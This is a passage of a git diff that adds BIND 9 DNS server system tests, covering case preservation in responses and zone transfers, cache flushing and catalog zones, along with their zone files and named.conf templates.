flushtest.example ns2/named_dump.db.test$n | grep -E '(TXT|ANY)' | wc -l` +[ $nrecords -eq 1 ] || { ret=1; echo_i "found $nrecords records expected 1"; } +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check flushtree clears adb correctly ($n)" +ret=0 +load_cache +dump_cache +mv ns2/named_dump.db.test$n ns2/named_dump.db.test$n.a +sed -n '/plain success\/timeout/,/Unassociated entries/p' \ + ns2/named_dump.db.test$n.a > sed.out.$n.a +grep 'plain success/timeout' sed.out.$n.a > /dev/null 2>&1 || ret=1 +grep 'Unassociated entries' sed.out.$n.a > /dev/null 2>&1 || ret=1 +grep 'ns.flushtest.example' sed.out.$n.a > /dev/null 2>&1 || ret=1 +$RNDC $RNDCOPTS flushtree flushtest.example || ret=1 +dump_cache +mv ns2/named_dump.db.test$n ns2/named_dump.db.test$n.b +sed -n '/plain success\/timeout/,/Unassociated entries/p' \ + ns2/named_dump.db.test$n.b > sed.out.$n.b +grep 'plain success/timeout' sed.out.$n.b > /dev/null 2>&1 || ret=1 +grep 'Unassociated entries' sed.out.$n.b > /dev/null 2>&1 || ret=1 +grep 'ns.flushtest.example' sed.out.$n.b > /dev/null 2>&1 && ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check expire option returned from primary zone ($n)" +ret=0 +$DIG @10.53.0.1 -p ${PORT} +expire soa expire-test > dig.out.expire +grep EXPIRE: dig.out.expire > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check expire option returned from secondary zone ($n)" +ret=0 +$DIG @10.53.0.2 -p ${PORT} +expire soa expire-test > dig.out.expire +grep EXPIRE: dig.out.expire > /dev/null || ret=1 +if [ $ret != 0 ]; then echo_i "failed"; fi +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/case/clean.sh b/bin/tests/system/case/clean.sh new file mode 100644 index 0000000..2c7bf97 --- /dev/null +++ b/bin/tests/system/case/clean.sh @@ -0,0 +1,24 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.ns*.test* +rm -f ns*/named.conf +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/named.run +rm -f ns1/dynamic.db +rm -f ns1/dynamic.db.jnl +rm -f ns2/dynamic.bk +rm -f ns2/dynamic.bk.jnl +rm -f ns2/example.bk +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/case/dynamic.good b/bin/tests/system/case/dynamic.good new file mode 100644 index 0000000..66f8afd --- /dev/null +++ b/bin/tests/system/case/dynamic.good @@ -0,0 +1,6 @@ +DyNaMiC. 300 IN SOA mname1. . 2000042407 20 20 1814400 3600 +DyNaMiC. 300 IN NS ns1.DYNAMIC. +DynamiC. 300 IN MX 0 mail.eXaMpLe. +mAiL.DynamiC. 300 IN A 10.53.0.1 +ns1.DYNAMIC. 300 IN A 10.53.0.1 +DyNaMiC. 300 IN SOA mname1. . 2000042407 20 20 1814400 3600 diff --git a/bin/tests/system/case/ns1/dynamic.db.in b/bin/tests/system/case/ns1/dynamic.db.in new file mode 100644 index 0000000..b39b519 --- /dev/null +++ b/bin/tests/system/case/ns1/dynamic.db.in @@ -0,0 +1,26 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +$ORIGIN DyNaMiC. +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) +$ORIGIN DYNAMIC. + NS ns1 +ns1 A 10.53.0.1 +$ORIGIN DynamiC. +@ MX 0 mail.eXaMpLe. +mAiL A 10.53.0.1 diff --git a/bin/tests/system/case/ns1/example.db b/bin/tests/system/case/ns1/example.db new file mode 100644 index 0000000..b58414c --- /dev/null +++ b/bin/tests/system/case/ns1/example.db @@ -0,0 +1,23 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +$TTL 300 ; 5 minutes +@ IN SOA mname1. . ( + 2000042407 ; serial + 20 ; refresh (20 seconds) + 20 ; retry (20 seconds) + 1814400 ; expire (3 weeks) + 3600 ; minimum (1 hour) + ) + NS ns1 +ns1 A 10.53.0.1 +@ MX 0 mail.eXaMpLe. +mAiL A 10.53.0.1 diff --git a/bin/tests/system/case/ns1/named.conf.in b/bin/tests/system/case/ns1/named.conf.in new file mode 100644 index 0000000..076b9d0 --- /dev/null +++ b/bin/tests/system/case/ns1/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; + minimal-responses no; +}; + +zone "example" { + type primary; + file "example.db"; + also-notify { 10.53.0.2; }; +}; + +zone "dynamic" { + type primary; + file "dynamic.db"; + allow-update { any; }; + also-notify { 10.53.0.2; }; +}; diff --git a/bin/tests/system/case/ns2/named.conf.in b/bin/tests/system/case/ns2/named.conf.in new file mode 100644 index 0000000..0a5c76f --- /dev/null +++ b/bin/tests/system/case/ns2/named.conf.in @@ -0,0 +1,40 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + ixfr-from-differences yes; + check-integrity no; + no-case-compress { 10.53.0.2; }; + minimal-responses no; +}; + +zone "example" { + type secondary; + file "example.bk"; + primaries { 10.53.0.1; }; +}; + +zone "dynamic" { + type secondary; + file "dynamic.bk"; + primaries { 10.53.0.1; }; +}; diff --git a/bin/tests/system/case/postns1.good b/bin/tests/system/case/postns1.good new file mode 100644 index 0000000..fcb3f9c --- /dev/null +++ b/bin/tests/system/case/postns1.good @@ -0,0 +1,6 @@ +dYNAMIc. 300 IN SOA mname1. . 2000042409 20 20 1814400 3600 +DyNaMiC. 300 IN NS ns1.DYNAMIC. +DynamiC. 300 IN MX 0 mail.eXaMpLe. +mAiL.DynamiC. 300 IN A 10.53.0.1 +Ns1.DyNaMIC. 300 IN A 10.53.0.1 +dYNAMIc. 300 IN SOA mname1. . 2000042409 20 20 1814400 3600 diff --git a/bin/tests/system/case/postupdate.good b/bin/tests/system/case/postupdate.good new file mode 100644 index 0000000..7755928 --- /dev/null +++ b/bin/tests/system/case/postupdate.good @@ -0,0 +1,6 @@ +dYNAMIc. 300 IN SOA mname1. . 2000042408 20 20 1814400 3600 +DyNaMiC. 300 IN NS ns1.DYNAMIC. +DynamiC. 300 IN MX 0 mail.eXaMpLe. +mAiL.DynamiC. 300 IN A 10.53.0.1 +ns1.DYNAMIC. 300 IN A 10.53.0.1 +dYNAMIc. 300 IN SOA mname1. . 2000042408 20 20 1814400 3600 diff --git a/bin/tests/system/case/setup.sh b/bin/tests/system/case/setup.sh new file mode 100644 index 0000000..f691185 --- /dev/null +++ b/bin/tests/system/case/setup.sh @@ -0,0 +1,19 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +cp -f ns1/dynamic.db.in ns1/dynamic.db +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named.conf.in ns2/named.conf diff --git a/bin/tests/system/case/tests.sh b/bin/tests/system/case/tests.sh new file mode 100644 index 0000000..96e8924 --- /dev/null +++ b/bin/tests/system/case/tests.sh @@ -0,0 +1,150 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" + +wait_for_serial() ( + $DIG $DIGOPTS "@$1" "$2" SOA > "$4" + serial=$(awk '$4 == "SOA" { print $7 }' "$4") + [ "$3" -eq "${serial:--1}" ] +) + +status=0 +n=0 + +n=`expr $n + 1` +echo_i "waiting for zone transfer to complete ($n)" +ret=0 +for i in 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS soa example. @10.53.0.2 > dig.ns2.test$n + grep SOA dig.ns2.test$n > /dev/null && break + sleep 1 +done +for i in 1 2 3 4 5 6 7 8 9 +do + $DIG $DIGOPTS soa dynamic. @10.53.0.2 > dig.ns2.test$n + grep SOA dig.ns2.test$n > /dev/null && break + sleep 1 +done + +n=`expr $n + 1` +echo_i "testing case preserving responses - no acl ($n)" +ret=0 +$DIG $DIGOPTS mx example. @10.53.0.1 > dig.ns1.test$n +grep "0.mail.eXaMpLe" dig.ns1.test$n > /dev/null || ret=1 +grep "mAiL.example" dig.ns1.test$n > /dev/null || ret=1 +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing no-case-compress acl '{ 10.53.0.2; }' ($n)" +ret=0 + +# check that we preserve zone case for non-matching query (10.53.0.1) +$DIG $DIGOPTS mx example. -b 10.53.0.1 @10.53.0.1 > dig.ns1.test$n +grep "0.mail.eXaMpLe" dig.ns1.test$n > /dev/null || ret=1 +grep "mAiL.example" dig.ns1.test$n > /dev/null || ret=1 + +# check that we don't preserve zone case for match (10.53.0.2) +$DIG $DIGOPTS mx example. -b 10.53.0.2 @10.53.0.2 > dig.ns2.test$n +grep "0.mail.example" dig.ns2.test$n > /dev/null || ret=1 +grep "mail.example" dig.ns2.test$n > /dev/null || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "testing load of dynamic zone with various \$ORIGIN values ($n)" +ret=0 +$DIG $DIGOPTS axfr dynamic @10.53.0.1 > dig.ns1.test$n +digcomp dig.ns1.test$n dynamic.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "transfer of dynamic zone with various \$ORIGIN values ($n)" +ret=0 +$DIG $DIGOPTS axfr dynamic @10.53.0.2 > dig.ns2.test$n +digcomp dig.ns2.test$n dynamic.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "change SOA owner case via update ($n)" +$NSUPDATE << EOF +server 10.53.0.1 ${PORT} +zone dynamic +update add dYNAMIc 0 SOA mname1. . 2000042408 20 20 1814400 3600 +send +EOF +$DIG $DIGOPTS axfr dynamic @10.53.0.1 > dig.ns1.test$n +digcomp dig.ns1.test$n postupdate.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +ret=0 +echo_i "wait for zone to transfer ($n)" +retry_quiet 20 wait_for_serial 10.53.0.2 dynamic 2000042408 dig.ns2.test$n || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check SOA owner case is transferred to secondary ($n)" +ret=0 +$DIG $DIGOPTS axfr dynamic @10.53.0.2 > dig.ns2.test$n +digcomp dig.ns2.test$n postupdate.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +#update delete Ns1.DyNaMIC. 300 IN A 10.53.0.1 +n=`expr $n + 1` +echo_i "change A record owner case via update ($n)" +$NSUPDATE << EOF +server 10.53.0.1 ${PORT} +zone dynamic +update add Ns1.DyNaMIC. 300 IN A 10.53.0.1 +send +EOF +$DIG $DIGOPTS axfr dynamic @10.53.0.1 > dig.ns1.test$n +digcomp dig.ns1.test$n postns1.good || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +ret=0 +echo_i "wait for zone to transfer ($n)" +retry_quiet 20 wait_for_serial 10.53.0.2 dynamic 2000042409 dig.ns2.test$n || ret=1 + +test $ret -eq 0 || echo_i "failed" +status=`expr $status + $ret` + +n=`expr $n + 1` +echo_i "check A owner case is transferred to secondary ($n)" +ret=0 +$DIG $DIGOPTS axfr dynamic @10.53.0.2 > dig.ns2.test$n +digcomp dig.ns2.test$n postns1.good || ret=1 +status=`expr $status + $ret` + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 diff --git a/bin/tests/system/catz/clean.sh b/bin/tests/system/catz/clean.sh new file mode 100644 index 0000000..b021f3b --- /dev/null +++ b/bin/tests/system/catz/clean.sh @@ -0,0 +1,32 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +rm -f dig.out.* +rm -f ns*/*.jnl +rm -f ns*/*.nzf +rm -f ns*/named.lock +rm -f ns*/named.memstats +rm -f ns*/named.conf +rm -f ns*/named.run +rm -f ns*/named.run.prev +rm -f ns1/*dom*example.db +rm -f ns2/__catz__*db +rm -f ns2/named.conf.tmp +rm -f ns3/dom13.example.db ns3/dom14.example.db +rm -f ns4/catalog-self.example.db +rm -f nsupdate.out.* +rm -f ns[123]/catalog[1234].example.db +rm -rf ns2/zonedir +rm -f ns*/*.nzd ns*/*.nzd-lock +rm -f ns*/managed-keys.bind* +rm -f wait_for_message.* diff --git a/bin/tests/system/catz/ns1/catalog.example.db.in b/bin/tests/system/catz/ns1/catalog.example.db.in new file mode 100644 index 0000000..a0bab0d --- /dev/null +++ b/bin/tests/system/catz/ns1/catalog.example.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA . . 1 86400 3600 86400 3600 +@ 3600 IN NS invalid. +version IN TXT "1" diff --git a/bin/tests/system/catz/ns1/named.conf.in b/bin/tests/system/catz/ns1/named.conf.in new file mode 100644 index 0000000..b64b4d5 --- /dev/null +++ b/bin/tests/system/catz/ns1/named.conf.in @@ -0,0 +1,72 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + allow-new-zones yes; + pid-file "named.pid"; + listen-on { 10.53.0.1; }; + listen-on port @EXTRAPORT1@ { 10.53.0.1; }; + listen-on-v6 { none; }; + notify no; + recursion no; + allow-transfer { any; }; +}; + +zone "catalog1.example" { + type primary; + file "catalog1.example.db"; + allow-transfer { any; }; + allow-update { any; }; + also-notify { 10.53.0.2; }; + notify explicit; +}; + +zone "catalog3.example" { + type primary; + file "catalog3.example.db"; + allow-transfer { any; }; + allow-update { any; }; + also-notify { 10.53.0.2; }; + notify explicit; +}; + +zone "catalog4.example" { + type primary; + file "catalog4.example.db"; + allow-transfer { any; }; + allow-update { any; }; + also-notify { 10.53.0.2; }; + notify explicit; +}; + +/* catalog5 is missing on purpose */ + +key tsig_key. { + secret "LSAnCU+Z"; + algorithm @DEFAULT_HMAC@; +}; + +key next_key. { + secret "LaAnCU+Z"; + algorithm @DEFAULT_HMAC@; +}; diff --git a/bin/tests/system/catz/ns2/named1.conf.in b/bin/tests/system/catz/ns2/named1.conf.in new file mode 100644 index 0000000..38381eb --- /dev/null +++ b/bin/tests/system/catz/ns2/named1.conf.in @@ -0,0 +1,98 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + notify no; + recursion no; + serial-query-rate 100; + catalog-zones { + zone "catalog1.example" + default-masters { 10.53.0.1; } + in-memory no + zone-directory "zonedir"; + zone "catalog2.example" + default-masters { 10.53.0.1 port @EXTRAPORT1@; } + in-memory yes; + zone "catalog3.example" + default-masters { 10.53.0.1; } + zone-directory "nonexistent"; +#T1 zone "catalog4.example" +#T1 default-masters { 10.53.0.1; }; +#T2 zone "catalog5.example" +#T2 default-masters { 10.53.0.1; }; + }; +}; + +# A faulty dlz configuration to check if named and catz survive a certain class +# of failed configuration attempts (see GL #3060). +# We use "dlz" because the dlz processing code is located in an ideal place in +# the view configuration function for the test to cover the view reverting code. +#T3dlz "bad-dlz" { +#T3 database "dlopen bad-dlz.so example.org"; +#T3}; + +zone "catalog1.example" { + type secondary; + file "catalog1.example.db"; + primaries { 10.53.0.1; }; +}; + +zone "catalog2.example" { + type secondary; + file "catalog2.example.db"; + primaries { 10.53.0.3; }; +}; + +zone "catalog3.example" { + type secondary; + file "catalog3.example.db"; + primaries { 10.53.0.1; }; +}; + +zone "catalog4.example" { + type secondary; + file "catalog4.example.db"; + primaries { 10.53.0.1; }; +}; + +# When the following zone configuration is enabled, "dom3.example" should +# already exist as a member of "catalog1.example", and named should be able +# to deal with that situation (see GL #3911). Make sure that this duplicate +# zone comes after the the "catalog1.example" zone in the configuration file. +#T4zone "dom3.example" { +#T4 type secondary; +#T4 file "dom2.example.db"; +#T4}; + +key tsig_key. { + secret "LSAnCU+Z"; + algorithm @DEFAULT_HMAC@; +}; + +key next_key. { + secret "LaAnCU+Z"; + algorithm @DEFAULT_HMAC@; +}; diff --git a/bin/tests/system/catz/ns2/named2.conf.in b/bin/tests/system/catz/ns2/named2.conf.in new file mode 100644 index 0000000..c167310 --- /dev/null +++ b/bin/tests/system/catz/ns2/named2.conf.in @@ -0,0 +1,62 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.2 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.2; + notify-source 10.53.0.2; + transfer-source 10.53.0.2; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.2; }; + listen-on-v6 { fd92:7065:b8e:ffff::2; }; + notify no; + recursion no; + serial-query-rate 100; + # removed catalog-zone option, otherwise this is + # identical to named1.conf.in +}; + +zone "catalog1.example" { + type secondary; + file "catalog1.example.db"; + primaries { 10.53.0.1; }; +}; + +zone "catalog2.example" { + type secondary; + file "catalog2.example.db"; + primaries { 10.53.0.3; }; +}; + +zone "catalog3.example" { + type secondary; + file "catalog3.example.db"; + primaries { 10.53.0.1; }; +}; + +zone "catalog4.example" { + type secondary; + file "catalog4.example.db"; + primaries { 10.53.0.1; }; +}; + +key tsig_key. { + secret "LSAnCU+Z"; + algorithm @DEFAULT_HMAC@; +}; diff --git a/bin/tests/system/catz/ns3/catalog.example.db.in b/bin/tests/system/catz/ns3/catalog.example.db.in new file mode 100644 index 0000000..eccb4f1 --- /dev/null +++ b/bin/tests/system/catz/ns3/catalog.example.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA . . 2670950424 86400 3600 86400 3600 +@ 3600 IN NS invalid. +version IN TXT "1" diff --git a/bin/tests/system/catz/ns3/dom5.example.db b/bin/tests/system/catz/ns3/dom5.example.db new file mode 100644 index 0000000..5779aaf --- /dev/null +++ b/bin/tests/system/catz/ns3/dom5.example.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA . . 1 3600 3600 3600 3600 +@ IN NS invalid. diff --git a/bin/tests/system/catz/ns3/dom6.example.db b/bin/tests/system/catz/ns3/dom6.example.db new file mode 100644 index 0000000..5779aaf --- /dev/null +++ b/bin/tests/system/catz/ns3/dom6.example.db @@ -0,0 +1,13 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 IN SOA . . 1 3600 3600 3600 3600 +@ IN NS invalid. diff --git a/bin/tests/system/catz/ns3/named.conf.in b/bin/tests/system/catz/ns3/named.conf.in new file mode 100644 index 0000000..7e6a8ae --- /dev/null +++ b/bin/tests/system/catz/ns3/named.conf.in @@ -0,0 +1,57 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.3 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.3; + notify-source 10.53.0.3; + transfer-source 10.53.0.3; + port @PORT@; + allow-new-zones yes; + pid-file "named.pid"; + provide-ixfr no; + listen-on { 10.53.0.3; }; + listen-on-v6 { fd92:7065:b8e:ffff::3; }; + notify no; + recursion no; +}; + +zone "catalog2.example" { + type primary; + file "catalog2.example.db"; + allow-transfer { any; }; + allow-update { any; }; + also-notify { 10.53.0.2; }; + notify explicit; +}; + +zone "dom5.example" { + type primary; + file "dom5.example.db"; + allow-transfer { any; }; + allow-update { any; }; + notify explicit; +}; + +zone "dom6.example" { + type primary; + file "dom6.example.db"; + allow-transfer { any; }; + allow-update { any; }; + notify explicit; +}; diff --git a/bin/tests/system/catz/ns4/catalog.example.db.in b/bin/tests/system/catz/ns4/catalog.example.db.in new file mode 100644 index 0000000..a0bab0d --- /dev/null +++ b/bin/tests/system/catz/ns4/catalog.example.db.in @@ -0,0 +1,14 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +@ 3600 SOA . . 1 86400 3600 86400 3600 +@ 3600 IN NS invalid. +version IN TXT "1" diff --git a/bin/tests/system/catz/ns4/named.conf.in b/bin/tests/system/catz/ns4/named.conf.in new file mode 100644 index 0000000..5f99308 --- /dev/null +++ b/bin/tests/system/catz/ns4/named.conf.in @@ -0,0 +1,55 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +include "../../common/rndc.key"; + +controls { + inet 10.53.0.4 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +options { + query-source address 10.53.0.4; + notify-source 10.53.0.4; + transfer-source 10.53.0.4; + port @PORT@; + pid-file "named.pid"; + listen-on { 10.53.0.4; }; + listen-on-v6 { fd92:7065:b8e:ffff::4; }; + notify no; + notify-delay 0; + recursion no; + serial-query-rate 100; + ixfr-from-differences yes; // GL #3777 + + catalog-zones { + zone "catalog-self.example" + min-update-interval 1s + default-masters { 10.53.0.4; }; + }; +}; + +zone "catalog-self.example" { + type primary; + file "catalog-self.example.db"; + notify explicit; +}; + +key tsig_key. { + secret "LSAnCU+Z"; + algorithm @DEFAULT_HMAC@; +}; + +key next_key. { + secret "LaAnCU+Z"; + algorithm @DEFAULT_HMAC@; +}; diff --git a/bin/tests/system/catz/setup.sh b/bin/tests/system/catz/setup.sh new file mode 100644 index 0000000..d8ea177 --- /dev/null +++ b/bin/tests/system/catz/setup.sh @@ -0,0 +1,30 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf +copy_setports ns2/named1.conf.in ns2/named.conf +copy_setports ns3/named.conf.in ns3/named.conf +copy_setports ns4/named.conf.in ns4/named.conf + +cp -f ns1/catalog.example.db.in ns1/catalog1.example.db +cp -f ns3/catalog.example.db.in ns3/catalog2.example.db +cp -f ns1/catalog.example.db.in ns1/catalog3.example.db +cp -f ns1/catalog.example.db.in ns1/catalog4.example.db +cp -f ns4/catalog.example.db.in ns4/catalog-self.example.db + +mkdir -p ns2/zonedir diff --git a/bin/tests/system/catz/tests.sh b/bin/tests/system/catz/tests.sh new file mode 100644 index 0000000..69b3a57 --- /dev/null +++ b/bin/tests/system/catz/tests.sh @@ -0,0 +1,1915 @@ +#!/bin/sh -x + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +set -e + +# shellcheck source=conf.sh +SYSTEMTESTTOP=.. +. 